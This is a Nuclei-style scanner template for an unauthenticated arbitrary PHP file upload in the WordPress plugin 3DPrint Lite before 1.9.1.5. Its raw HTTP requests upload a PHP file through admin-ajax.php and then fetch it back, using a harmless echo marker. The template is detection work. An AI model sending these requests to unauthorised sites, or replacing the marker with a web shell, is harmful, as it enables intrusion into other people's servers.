47 lines
1.7 KiB
YAML
47 lines
1.7 KiB
YAML
id: 3dprint-arbitrary-file-upload
|
|
|
|
info:
|
|
name: 3DPrint Lite < 1.9.1.5 - Unauthenticated Arbitrary File Upload
|
|
author: SecTheBit
|
|
severity: high
|
|
description: |
|
|
The p3dlite_handle_upload AJAX action of the plugin does not have any authorisation and does not check the uploaded file, allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282
|
|
- https://www.exploit-db.com/exploits/50321
|
|
metadata:
|
|
verified: true
|
|
tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
|
|
|
|
-----------------------------54331109111293931601238262353
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
p3dlite_handle_upload
|
|
-----------------------------54331109111293931601238262353
|
|
Content-Disposition: form-data; name="file"; filename={{randstr}}.php
|
|
Content-Type: text/php
|
|
|
|
<?php echo '3DPrint-arbitrary-file-upload'; ?>
|
|
-----------------------------54331109111293931601238262353--
|
|
|
|
- |
|
|
GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(all_headers_2, "text/html")'
|
|
- "status_code_2 == 200"
|
|
- "contains(body_2, '3DPrint-arbitrary-file-upload')"
|
|
condition: and
|